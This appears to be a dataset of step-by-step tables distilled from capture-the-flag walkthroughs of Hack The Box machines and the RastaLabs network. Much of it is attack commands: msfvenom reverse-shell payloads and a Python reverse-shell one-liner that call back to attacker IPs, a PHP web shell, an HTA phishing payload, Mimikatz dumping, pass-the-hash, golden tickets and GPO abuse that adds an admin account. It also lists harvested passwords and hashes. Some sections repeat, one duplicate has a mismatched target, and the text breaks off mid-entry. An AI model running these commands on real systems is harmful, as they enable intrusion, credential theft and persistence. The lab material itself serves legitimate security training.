1

Enumeration

Online search for lab IP range

N/A

2

Enumeration

Port scanning with masscan

masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0

3

Enumeration

Detailed host scanning with nmap

nmap (specific commands not provided)

4

Enumeration

Finding domain names with crackmapexec

crackmapexec (specific commands not provided)

1

Recon

Nmap scanning

nmap -sC -sV -oA nmap/result 10.10.10.210

2

Enumeration

Gobuster directory scanning

gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50

3

Credential Harvesting

Gathering usernames

Gather usernames manually and create a user.txt file

4

Credential Harvesting

Password spraying

python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01

5

Phishing

Sending phishing emails

Use Outlook to send phishing emails and capture NTLMv2 hash with Responder

6

Hash Cracking

Cracking NTLMv2 hash

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force

7

Access

PowerShell remote session

$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson

8

Privilege Escalation

Creating a Symlink

New-Item -ItemType Junction -Path 'C:\\ProgramData\\root' -Target 'C:\\Users\\Administrator'

9

Privilege Escalation

Using Check-File command

Check-File C:\\programdata\\root\\Desktop\\root.txt

10

Exfiltration

Transferring files with nc.exe

iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe'

1

Recon

Nmap scanning

nmap -sC -sV -oA nmap/result 10.10.10.211

2

Web Enumeration

Checking server with Wappalyzer

Use Wappalyzer to identify backend technologies

3

Web Enumeration

Analyzing .git directory

Check the Gemfile in the .git directory for Ruby and Gem versions

4

Exploitation

Exploiting Ruby on Rails

Use a Ruby on Rails exploit

5

Post-Exploitation

Capturing request in Burp

Capture the request and modify it with the exploit

6

Post-Exploitation

Getting a reverse shell

Use netcat listener and send the exploit to get a reverse shell

7

Privilege Escalation

Cracking password hashes

Use John the Ripper to crack password hashes found in /var/backups

8

Privilege Escalation

Using .google_authenticator file

Use the contents of .google_authenticator to bypass two-factor authentication

9

Privilege Escalation

Synchronizing time for successful exploit

Adjust the system time to match the timezone for the exploit to work

10

Privilege Escalation

Gaining root access with GTFOBins

sudo gem open -e "/bin/sh -c /bin/sh" rdoc to gain root access

1

Recon

Nmap scanning

nmap -sV -sC -oN nmap 10.10.10.237

2

File Analysis

Analyzing executable file

file heedv1\\ Setup\\ 1.0.0.exe

3

SMB Enumeration

Enumerating SMB shares

smbclient -L \\\\10.10.10.237

4

SMB File Transfer

Transferring files via SMB

smbclient \\\\\\\\10.10.10.237\\Software_Updates then get UAT_Testing_Procedures.pdf

5

Exploitation

Crafting malicious binary

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "r'sp00f.exe"

6

YML File Creation

Creating a .yml file for the exploit

Manual creation of latest.yml file

7

SMB File Transfer

Uploading .yml file via SMB

smbclient \\\\\\\\10.10.10.237\\Software_Updates then put latest.yml

8

Reverse Shell

Obtaining a reverse shell

Use Metasploit to listen for the reverse shell

9

Redis Exploitation

Exploiting Redis

redis-cli -h 10.10.10.237 then get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0

10

Password Decryption

Decrypting password

python3 decrypt.py with the script provided in the summary

1

Data Analysis

Reading pcap file

Use NetworkMiner to read the .dmp file and extract the secret file

2

Cryptography

Decoding the flag

Use filecryptopgraphy.psm1 PowerShell module

3

File Preparation

Preparing files for decryption

Rename the secret file to secret.txt.AES on ws04

4

Key Conversion

Converting key for decryption

`$key = Get-Content key.txt

5

File Decryption

Decrypting the file

Unprotect-File '.\\secret.txt.AES' -Algorithm AES -Key $key

6

Flag Retrieval

Retrieving the flag

The flag is RASTA{cryp70_3xf1l7r4710n}

1

Credential Dumping

Enumerating credentials on WS02

Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force

2

Credential Dumping

Using Mimikatz to dump creds

Upload mimikatz.exe and execute sekurlsa::dpapi to get the master key

3

Credential Decryption

Decrypting credentials

dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey:40fc84...

4

Port Forwarding

Setting up port forwarding

portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389

5

RDP Connection

Connecting via RDP with Remmina

Install Remmina, import sql01.rdp, change host, export to .rdp file

6

RDP Connection

Using xfreerdp to connect

xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local

7

Flag Retrieval

Retrieving the flag

The flag is RASTA{c00k1n6_w17h_645_n0w}

1

Credential Enumeration

Finding LAPS group members

Enumeration to find ngodfrey_adm is part of LAPS group on WS05

2

Credential Access

Dumping credentials with PowerSploit

powershell -ep bypass then Import-module ./PowerSploit.psd1

3

Credential Access

Using credentials for access

$SecPassword = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force then $cred = New-Object System.Management.Automation.PSCredential('rastalabs.local\\ngodfrey_adm', $SecPassword)

4

Credential Access

Getting AD object with credentials

Get-ADObject -Name web01 -DomainController 10.10.120.1 -Credential $Cred

5

Local Admin Passwords

Retrieving local admin passwords

Passwords are listed for WS01, WS02, WS03, WS04, WS05

6

Port Forwarding

Setting up port forwarding with Meterpreter

portfwd add -L 10.10.14.83 -r 10.10.121.101 -l 447 -p 445 and similar for other ports

7

Exploitation

Using MS17-010 exploit for admin shell

exploit/windows/smb/ms17_010_psexec with lport 80, 443, 8080

8

Flag Retrieval

Retrieving flags from WS02 and WS04

Flags are RASTA{3v3ryb0dy_l0v35_l4p5}, RASTA{wh3r3_w45_2f4_!?}, RASTA{50m371m35_y0u_mu57_b4ck7r4ck}

9

Post-Exploitation

Running Mimikatz on WS02

privilege::debug then sekurlsa::logonPasswords

10

File Permissions

Modifying file permissions for flag

icacls flag.txt /grant administrator:F or icacls flag.txt /grant RLAB\\ahope:F

1

Privilege Escalation

AS-REP Roasting

Import-module ./asreproast.ps1 Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 | select -expand hash

2

Hash Extraction

Saving Hash

Copy the hash to a txt file and save it with UTF-8 encoding

3

Wordlist Creation

Using kwprocessor

./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > kwp3.txt

4

Password Cracking

Using John the Ripper

Use John the Ripper (jumbo version) to crack the hash

5

Credential Use

User Enumeration

net use H: \\\\fs01.rastalabs.local\\home$\\ngodfrey /user:ngodfrey "zaq123$%^&*()_+"

6

Flag Retrieval

Accessing Flag

The flag is RASTA{k3rb3r05_15_7r1cky}

1

Enumeration

Viewing shares on fs01

net view \\fs01 /all

2

Enumeration

Using PowerSploit for enumeration

powershell -ep bypass Import-module ./PowerSploit.psd1 Get-NetShare \\fs01

3

Flag Retrieval

Accessing open shares

Flag is RASTA{ju1cy_1nf0_1n_0p3n_5h4r35}

1

Phishing

Creating phishing HTA

python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta

2

Web Server Setup

Hosting HTA on Apache2

copy index.html launcher.hta /var/www/html service apache2 start

3

Listener Setup

Setting up Metasploit listener

msfconsole -r unicorn.rc

4

Share Enumeration

Viewing shares on the network

net share net view net use K: \\\\hostname\\share$ net view \\\\hostname /all

5

User Enumeration

Displaying domain user accounts

net user /domain

6

User Information

Viewing user info

net user [username] /domain

7

Group Enumeration

Viewing domain group members

net group finance /domain

8

Drive Enumeration

Listing logical drives

fsutil fsinfo drives wmic logicaldisk get name diskpart > list volume

9

Network Recon

Pinging servers for IP addresses

ping DC01 ping FS01 ping MX01 ping NIX01 ping SQL01 ping WS01 ping WS02 ping WS03 ping WS05

10

Flag Retrieval

Accessing the flag

Flag is RASTA{w007_f007h0ld_l375_pwn}

11

KeePass Database

Found KeePass database and key file

Located in M:\\Documents

1

User Enumeration

Finding user directory on fs01

net user ahope /domain

2

Network Drive Mount

Mounting network drive to access file

net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209"

3

File Conversion

Converting .ppk to OpenSSH format

puttygen nix01.ppk -O private-openssh -o nix

4

Network Configuration

Adding route and running proxy server

Commands for adding route and running socks4a proxy server on ws01 not provided in summary

5

SSH Connection

Connecting via SSH with proxychains

proxychains ssh -i nix ahope@10.10.122.20

6

Privilege Escalation

Using exploit for privilege escalation

Compile exploit with gcc exp1.c -o exploit

7

File Transfer

Transferring exploit to target

proxychains scp -i nix -r exploit ahope@10.10.122.20:/home/ahope

8

File Download

Downloading file from remote to local

proxychains scp -i nix ahope@10.10.122.20:/usr/local/sbin/paycalc /root/Desktop/rasta

9

Flag Retrieval

Retrieving the flag

Flag is RASTA{y0ur3_4_b4ll3r_70_637_7h15}

1

Port Forwarding

Forwarding port to ws01

portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445

2

Remote Execution

Using Metasploit psexec for shell

Use msf psexec to get a shell on ws01

3

Remote Execution

Using Impacket psexec for shell

Use Impacket psexec to get a shell on ws01, add route in meterpreter

4

Proxy Configuration

Setting SOCKS4a proxy in Metasploit

Set socks4a proxy in msf, then edit /etc/proxychains.conf

5

Enumeration

Using CrackMapExec to enumerate

proxychains crackmapexec 10.10.120.1 -u rweston_da -H <hash> --ntds drsuapi

6

Hash Dumping

Dumping hashes

Dump hashes with CrackMapExec and proxychains

7

Credential Access

Accessing vault with Mimikatz

Use Mimikatz on ws01 to access vault credentials

8

Credential Decryption

Decrypting credentials

dpapi::cred /in:C:\users\rweston\AppData\Local\Microsoft\Credentials\<hash> /masterkey:<masterkey>

9

Impersonation

Impersonating user with Incognito

In meterpreter, load incognito and impersonate rweston

10

Clipboard Monitoring

Monitoring clipboard for credentials

Transfer shell to Empire and monitor clipboard

11

RDP Connection

Connecting via RDP with credentials

xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10

12

Flag Retrieval

Retrieving the flag

Flag is RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}

1

Port Forwarding

Forwarding port to ws05

portfwd add -L 10.10.14.83 -r 10.10.123.102 -l 445 -p 445

2

Credential Use

Using rweston_da hash

rweston_da hash --- ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa

3

Exploitation

Exploit via smb/psexec

Use the hash with smb/psexec to exploit

4

Flag Retrieval

Retrieving the flag

Flag is RASTA{53rv1c3_4bu53_f7w}

1

Credential Use

Using epugh_adm credentials

Log in to web01 (10.10.110.10) and then RDP to sql01 (10.10.122.15) using epugh_adm creds

2

Lateral Movement

RDP to fs01 with gopikrishna

RDP to fs01 with user gopikrishna [local admin]

3

Malware Execution

Running p0wnedshell.exe

Run p0wnedshell.exe with admin cmd

4

Credential Dumping

Invoke Mimikatz from p0wnedshell

Use option 4 in p0wnedshell, invoke Mimikatz to get rweston_da NTLM hash

5

Credential Use

Pass-the-hash with Mimikatz

sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa

6

Golden Ticket Attack

Perform DCSync to get krbtgt hash

Use option 10 in p0wnedshell, perform DCSync

7

Golden Ticket Attack

Generate golden ticket

kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket

8

Golden Ticket Attack

Use golden ticket

kerberos::ptt C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket

9

Flag Retrieval

Accessing the flag

pushd \\\\dc01.rastalabs.local\\C$ Flag is RASTA{r4574l4b5_ch4mp10n}

1

Initial Access

Using epugh_adm credentials

Log in to web01 (10.10.110.10)

2

Lateral Movement

RDP to sql01 with epugh_adm creds

Take RDP of sql01 (10.10.122.15) using epugh_adm credentials

3

Database Access

Start SQL Management Studio

Start SQL Management Studio and connect via Windows authentication

4

Database Querying

Querying SQL database

use umbraco; SELECT TABLE_NAME FROM umbraco.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'

5

Flag Retrieval

Retrieving the flag from database

select * from Flag Flag is RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6}

1

Credential Use

Logging in with epugh_adm credentials

mstsc /v:web01 /u:epugh_adm /p:[password]

2

Lateral Movement

RDP to sql01 using epugh_adm

mstsc /v:sql01 /u:epugh_adm /p:[password]

3

GPO Enumeration

Enumerating GPO permissions

`Get-NetGPO

4

Group Membership

Checking group members

net user epugh_adm /domain

5

GPO Permission

Finding GPO with weak permissions

`Get-NetGPO -ComputerName fs01.rastalabs.local

6

OU Enumeration

Finding host with specific policy

`Get-NetOU -GUID "{DCE628BF-341C-4503-8181-3B8865700F6A}"

7

Policy Enumeration

Identifying applied policy

`Get-NetGPO -ComputerName fs01.rastalabs.local

8

GPO Abuse

Creating and applying immediate tasks

New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -force New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force

9

File Permissions

Modifying permissions for flag.txt

icacls flag.txt /grant administrators:F

10

Flag Retrieval

Retrieving the flag

Flag is RASTA{6p0_4bu53_15_h4rdc0r3}

1

Initial Recon

Nmap scan

nmap -sC -sV 10.10.10.197

2

DNS Enumeration

Brute-force subdomains

ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb" -fs 185

3

Email Gathering

Extract emails

Extract emails from http://sneakycorp.htb/team.php to mails.txt

4

Phishing

Send phishing emails

Use swaks to send emails to addresses in mails.txt

5

Credential Harvesting

Decode credentials

Use Burp Suite to decode credentials from intercepted traffic

6

Email Client Setup

Configure email client

Set up evolution with SMTP server and paulbyrd@sneakymailer.htb credentials

7

FTP Access

Access FTP

ftp 10.10.10.197 with credentials obtained

8

Reverse Shell

Upload and trigger reverse shell

Upload rev.php via FTP and trigger with curl

9

Privilege Escalation

Add SSH key to authorized keys

Add generated SSH key to /home/low/.ssh/authorized_keys via malicious package

10

Sudo Exploitation

Exploit sudo permissions

Use sudo /usr/bin/pip3 to execute a malicious package with a reverse shell

1

Port Scanning

Masscan and Nmap

masscan -p1-65535,U:1-65535 10.10.10.162 --rate=1000 -e tun0 nmap [options] [target]

2

Web Enumeration

Checking web ports

Access web service on ports 80 and 443

3

SSL Certificate

Viewing certificate

View SSL certificate details

4

Host File Editing

Adding VHOST to hosts file

Edit /etc/hosts to add staging-order.mango.htb

5

NoSQL Injection

Bypassing login

Use Burp Suite to intercept and modify request for NoSQL injection

6

Data Extraction

Automating credential extraction

Run Python script to extract credentials for admin and mango users

7

SSH Connection

Accessing SSH

SSH into the server using extracted credentials

8

User Flag Access

Retrieving user flag

Use su to login as admin and retrieve user flag

9

Privilege Escalation

Exploiting SUID file

Use SUID file to read root flag or exploit for root access

10

Root Flag Access

Reading root flag

Run binary or use jjs to read root flag

1

Reconnaissance

Nmap scan

nmap -sC -sV -oA nmap/result 10.10.10.214

2

Web Vulnerability Scan

Checking for JSON vulnerabilities

Use JSON Beautifier and Validator on http://10.10.10.214

3

Exploitation

Exploiting CVE-2019-12384 in fasterxml

Create dedsec.sql with payload and serve it with Python HTTP server

4

Initial Access

Gaining a shell as user pericles

Input crafted JSON to trigger the exploit and gain a shell

5

Privilege Escalation

Using timer_backup.sh for privilege escalation

Add your SSH public key to /root/.ssh/authorized_keys via timer_backup.sh

6

Alternative Privilege Escalation

Escalating privileges without SSH key

Use timer_backup.sh to add SUID bit to /bin/bash and open a root shell

7

Flag Capture

Capturing user and root flags

Use the gained shell to capture user.txt and root.txt

1

Reconnaissance

Nmap scan

nmap -sC -sV -oA nmap/result 10.10.10.194

2

Web Enumeration

Checking for JSON vulnerabilities

Use JSON Beautifier and Validator on http://10.10.10.214

3

Exploitation

Exploiting CVE-2019-12384 in fasterxml

Create dedsec.sql with payload and serve it with Python HTTP server

4

Initial Access

Gaining a shell as user pericles

Input crafted JSON to trigger the exploit and gain a shell

5

Privilege Escalation

Using timer_backup.sh for privilege escalation

Add your SSH public key to /root/.ssh/authorized_keys via timer_backup.sh

6

Alternative Privilege Escalation

Escalating privileges without SSH key

Use timer_backup.sh to add SUID bit to /bin/bash and open a root shell

7

Flag Capture

Capturing user and root flags

Use the gained shell to capture user.txt and root.txt

1

Reconnaissance

Nmap scan

nmap -sC -sV -oA nmap/result 10.10.10.186

2

Web Enumeration

Dirbuster scan

dirbuster

3

QUIC Protocol Access

Accessing HTTP/3 Protocol

cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https://quick.htb/

1

Reconnaissance

Nmap scan

nmap -T4 -p- -oA forwardslash.scan forwardslash.htb

2

Subdomain Enumeration

WFUZZ fuzzing

Use WFUZZ with common wordlists to find subdomains

3

Directory Enumeration

GoBuster scanning

Use GoBuster to enumerate directories

4

LFI Vulnerability

Exploiting Local File Inclusion

Use Burp Suite to exploit LFI and directory traversal

5

Database Credential Access

Obtaining credentials via LFI

Use LFI to read var/www/backup.forwardslash.htb/config.php for database credentials

6

API Exploitation

Using php://filter wrapper

Exploit API with php://filter/convert.base64_encode/resource to read files

7

FTP Credential Access

Decoding Base64 for credentials

Decode Base64 to find FTP credentials

8

SSH Access

Using FTP credentials for SSH

Use FTP credentials to access SSH

9

User Flag Acquisition

Enumerating user directories

Find and read user.txt in user's directory

1

Reconnaissance

Nmap Scanning

nmap -p- -A -T4 poo.htb

2

Directory Enumeration

Fuzzing with WFUZZ

wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ

3

Exploitation

Exploiting .DS_Store File

Use ds_store_exp tool to extract information from the .DS_Store file

1

Initial Recon

Nmap Scanning

nmap -p 1-16000 dyplesher.htb

2

Web Enumeration

WFUZZ Directory Discovery

wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt

3

Git Repository Cloning

Using GitDumper

./gitdumper.sh http://test.dyplesher.htb/.git/ test.dyplesher

4

Memcached Credential Access

Using memcached-cli to retrieve credentials

memcached-cli felamos:zxcvbnm@dyplesher.htb:11211

5

Password Cracking

Using John the Ripper

Use John the Ripper with retrieved hashes

6

Gogs Service Access

Logging into Gogs with cracked credentials

Log into Gogs service at port 3000

7

Git Bundle Analysis

Unpacking Git Bundles

Move .bundle files to 'Bundle-Unpack' directory and use Git Clone to unpack

1

Initial Recon

Nmap Scanning

nmap -p 1-16000 dyplesher.htb

2

Web Enumeration

WFUZZ Directory Discovery

wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt

3

Cloning Exposed Repository

Using GitDumper

./gitdumper.sh http://test.dyplesher.htb/.git/ test.dyplesher

4

Memcached Credential Access

Using memcached-cli

memcached-cli felamos:zxcvbnm@dyplesher.htb:11211

5

Cracking Hashes

Using John the Ripper

Use John the Ripper with retrieved hashes

6

Gogs Service Access

Logging into Gogs

Log into Gogs service at port 3000

7

Git Bundle Analysis

Unpacking Git Bundles

Move .bundle files to 'Bundle-Unpack' directory and use Git Clone to unpack

1

Initial Recon

Nmap Scanning

nmap -sV -p- -oA cascade.nmap cascade.htb

2

User Enumeration

Enum4Linux

enum4linux -a cascade.htb

3

LDAP Enumeration

Impacket LDAPSearch

impacket-ldapsearch -u 'r.thompson' -p 'rY4n5eva'

4

SMB Enumeration

Accessing SMB Shares

smbclient //cascade.htb/IT -U r.thompson

5

Log Analysis

Reviewing Service Logs

cat ArkAdRecycleBin.log

6

Registry Analysis

Downloading and Analyzing Registry

get VNC Install.reg; cat VNC Install.reg

7

Password Decryption

Decrypting VNC Passwords

Use online HEX decoder or VNC password decryption tool

8

Remote Access

Using Evil-WinRM

evil-winrm -i cascade.htb -u s.smith -p 'decrypted_password'

9

Share Enumeration

Listing SMB Shares

smbclient //cascade.htb/Audit$ -U s.smith

10

Database Analysis

Analyzing SQLite Database

Open Audit.db with a database viewer like EditPlus

1

Initial Recon

Nmap Scanning

nmap -sV -p- -oA blunder.nmap blunder.htb

2

Web Enumeration

Fuzzing with Extensions

wfuzz -u http://blunder.htb/FUZZ -w list.txt -t 50 --hw 0

3

Exploit Identification

Searchsploit

searchsploit bludit

4

Brute Force Attack

Using Custom Script

Custom Python script for brute-forcing

5

Exploitation

Metasploit Framework

msfconsole and use exploit for Bludit CMS

6

Shell Stabilization

Python TTY Spawn

python3 -c 'import pty; pty.spawn("/bin/bash")'

7

User Privilege Discovery

Checking Sudo Permissions

sudo -l

8

Privilege Escalation

Exploiting Sudo Bug CVE-2019-14287

sudo -u#-1 /bin/bash

1

Initial Recon

Nmap Scanning

nmap -sC -sV 10.10.10.203

2

SVN Enumeration

SVN Commands

svn help, svn list svn://10.10.10.203

3

Sub-Domain Discovery

Adding Sub-Domains to Hosts

Edit /etc/hosts and add sub-domains

4

SVN Log Analysis

Viewing SVN Logs

svn log svn://10.10.10.203/

5

SVN Diff Analysis

Viewing SVN Diffs

svn diff -c r2 svn://10.10.10.203

6

Azure DevOps Access

Logging into Azure DevOps

Use credentials to log into devops.worker.htb

7

Malicious File Upload

Creating and Uploading ASPX File

msfvenom to create payload.aspx and upload via pull request

8

Meterpreter Shell

Getting Reverse Shell

Set up listener with msfconsole and navigate to lens.worker.htb/payload.aspx

9

Post-Exploitation

Meterpreter Commands

getuid, sysinfo, cd /users, dir in meterpreter shell

1

Reconnaissance

Nmap Scanning

nmap -sC -sV 10.10.10.95

2

Access Tomcat

Default Credentials

Use default credentials tomcat:s3cret to access Apache Tomcat Manager

3

Deploy WAR

MsfVenom WAR File Creation

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.17 LPORT=4444 -f war > reverse_shell

4

Gain Shell

Netcat Listener

nc -lvnp 4444 then access the deployed WAR file to get a shell

5

Privilege Check

Whoami Command

whoami to check the current user privileges

6

Flag Acquisition

Directory Navigation and Reading

Navigate to C:\Users\Administrator\Desktop\flags and read 2 for the price of 1.txt

1

Initial Enumeration

Nmap Scanning

nmap -sC -sV -oN nmap/ 10.10.10.187

2

Accessing FTP

Using Found Credentials

Use ftpuser credentials found in credentials.txt

3

Exploring Web Server

Checking robots.txt

Access http://10.10.10.187/robots.txt to find disallowed entries

4

Downloading Files

Using FTP to Download Files

Download html.tar.gz and dump.sql from the server

5

Code Analysis

Reviewing PHP Scripts

Analyze db_admin.php and admin_tasks.php for potential credentials and functions

6

SSH Access

Using Credentials for SSH

Use waldo credentials to access SSH

7

Privilege Escalation

Analyzing Sudo Permissions

Run sudo -l to check for allowed commands for waldo

8

Exploiting Scripts

Using admin_tasks.sh for Privilege Escalation

Exploit the SETENV option in sudo to run admin_tasks.sh as root

9

Gaining Root

Python Path Hijacking

Use PYTHONPATH hijacking to get a root shell

1

Initial Enumeration

Nmap Scanning

nmap -sC -sV -oN nmap/ 10.10.10.187

2

Accessing FTP

Using Found Credentials

Use ftpuser credentials found in credentials.txt

3

Exploring Web Server

Checking robots.txt

Access http://10.10.10.187/robots.txt to find disallowed entries

4

Downloading Files

Using FTP to Download Files

Download html.tar.gz and dump.sql from the server

5

Code Analysis

Reviewing PHP Scripts

Analyze db_admin.php and admin_tasks.php for potential credentials and functions

6

SSH Access

Using Credentials for SSH

Use waldo credentials to access SSH

7

Privilege Escalation

Analyzing Sudo Permissions

Run sudo -l to check for allowed commands for waldo

8

Exploiting Scripts

Using admin_tasks.sh for Privilege Escalation

Exploit the SETENV option in sudo to run admin_tasks.sh as root

9

Gaining Root

Python Path Hijacking

Use PYTHONPATH hijacking to get a root shell

1

Initial Enumeration

Nmap Scanning

nmap -sC -sV -p- 10.10.10.200 -v --min-rate=10000

2

Accessing Rsync

Listing Rsync Modules

nc -vn 10.10.10.200 873 followed by list

3

Downloading Backups

Using Rsync to Download Files

rsync -av rsync://10.10.10.200/conf_backups files

4

Decrypting Backups

Decrypting EncFS

python encfs2john.py /root/hackthebox/machine/unbalanced/files/ > hash

john --wordlist=/usr/share/wordlists/rockyou.txt --progress-every=3 hash

5

Reading Files

Accessing Decrypted Configuration

encfsctl export files decrypt

Files

ls decrypt/ to view the decrypted files

1

Information Gathering

Nmap Scanning

nmap -sV -sC -v -p- --min-rate=10000 10.10.10.197

2

Subdomain Enumeration

Using ffuf for Subdomain Brute-Forcing

./ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb"

3

Email Collection

Extracting Emails from Web Page

Manually visit http://sneakycorp.htb/team.php and extract emails to mails.txt

4

Email Engagement

Sending Emails with swaks

while read mail; do swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials / Errors" --body "goto http://10.10.14.4/" --server 10.10.10.197; done < mails.txt

5

Credential Harvesting

Netcat Listener

nc -lvp 80 to listen for incoming connections

6

Accessing SMTP

Using evolution to Access SMTP

apt-get install evolution and configure with SMTP server 10.10.10.197 and email paulbyrd@sneakymailer.htb

7

Exploring Sent Items

Checking Sent Emails

Check sent items for any useful information after accessing the SMTP server

1

Reconnaissance

Web Server Analysis

Manual inspection of web application on port 80/tcp

2

Vulnerability Analysis

JWT Token Analysis

Decode JWT token, notice "kid" parameter pointing to an internal address

3

Exploitation

Custom JWT Token Creation

Develop jwt-token.py to generate a custom JWT token

4

Administration Panel Access

Access with JWT Token

Use generated JWT token to access the admin panel

5

Web Shell Upload

PHP File Upload

Upload a malicious PHP file as allowed by the admin panel

6

Reverse Shell

Exploit PHP File

Get a reverse shell as www-data from the uploaded PHP file

7

Post-Exploitation

User Access

Use home.tar.gz from /var/backups/ to login as user noah with SSH

8

Privilege Escalation

Docker Exploitation

Use docker exec -it webappdev01* as administrator

9

Root Access

CVE-2019-5736 Exploit

Modify and run CVE-2019-5736 exploit to get root access

1

Reconnaissance

Nmap Scan

nmap -sV -sT -sC -o nmapinitial ai.htb

2

Web Enumeration

Manual Inspection

Inspect web application on port 80/tcp, hover over logo for menu

3

Web Enumeration

Gobuster Directory Scan

gobuster dir -u http://ai.htb/ -w /usr/share/wordlists/dirb/common.txt

4

Audio File Handling

Convert MP3 to WAV

ffmpeg -i input.mp3 output.wav

5

SQL Injection

Extract Database Name

Audio payload: "one open single quote union select database open parenthesis close parenthesis comment database"

6

SQL Injection

Enumerate Table Names

Audio payload: "one open single quote union select test from test comment database"

7

SQL Injection

Enumerate Users Table

Audio payload: "one open single quote union select test from users comment database"

8

SQL Injection

Extract Passwords

Audio payload: "one open single quote union select password from users comment database"

9

Privilege Escalation

Exploit JDWP Service

Use jdwp-shellifier.py with reverse shell payload

1

Initial Recon

Nmap Scan

nmap -sC -sV -sS 10.10.10.184

2

FTP Enumeration

Anonymous FTP Access

ftp 10.10.10.184 (then use ls, cd, get commands to interact)

3

File Analysis

Reviewing Downloaded Files

get "Notes to do.txt", get "Confidential.txt"

4

Web Enumeration

Enumerate Web Pages

Manual inspection of web application on port 80/tcp

5

Exploitation

Exploit NVMS-1000 (CVE-2019-2085)

Use CVE details from Exploit-DB and Brup Suite to exploit

6

Credential Access

Extract Passwords via Directory Traversal

GET /../../../../../../../../../../../../windows/Users/Nadine/Desktop/Passwords.txt

7

Brute Force

SSH Brute Force with Hydra

hydra -L users.txt -P pass.txt 10.10.10.184 ssh

8

SSH Access

Login via SSH

SSH login with found credentials

9

Privilege Escalation

Exploit NSClient++ 0.5.2.35

Follow CVE details from Exploit-DB to exploit NSClient++

10

Local Port Forwarding

Port Forwarding via SSH

Use SSH port forwarding to interact with local services

1

Recon

Nmap Scan

nmap -sC -sV -sS 10.10.10.171

2

Web Enumeration

Manual Visit, Gobuster

Visit http://10.10.10.171, gobuster dir -u http://10.10.10.171/ -w common.txt

3

Exploitation

OpenNetAdmin RCE

Use exploit from amriunix/ona-rce repository

4

Initial Foothold

Reverse Shell

Gain reverse shell as www-data

5

User Access

Password Reuse

SSH as jimmy with reused credentials

6

Internal Service Access

Port Forwarding

Forward port 52846 to local machine and access internal service

7

Privilege Escalation

Cracking Hash

Crack sha512 hash to obtain jimmy's password

8

SSH Key Access

Decrypt SSH Key

Use ssh2john and john to decrypt Joanna's SSH key

9

Root Access

Sudo Exploitation of Nano

Use nano with sudo to gain root shell based on GTFOBins

1

Nmap Scanning

Nmap Scan

nmap -sC -sV -sS -T4 10.10.10.185

2

Enumerating Web Page

Manual Visit

Visit http://10.10.10.185

3

Bypass Login

SQL Injection

Use 'or''=' for both username and password

4

Uploading Shell

Bypass File Upload Restrictions

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' me.jpg

5

Gaining Access

Reverse Shell

http://10.10.10.185/images/uploads/me.php.jpg?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.43",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

6

Enumerating Credentials

Reading Configuration Files

cat /var/www/Magic/db.php5

7

Switching User Shell

User Switching

su theseus with password iamkingtheseus

8

Find SUID files

Privilege Escalation

Not specified in the summary

9

Getting ROOT

Exploitation

Not specified in the summary

1

Recon

Nmap Scan

nmap -sC -sV -sS -T4 10.10.10.229

2

Web Enumeration

Manual Visit, Gobuster

Visit http://10.10.10.229, gobuster dir -u http://10.10.10.229/ -w common.txt

3

Web Enumeration

Inspect Source Code

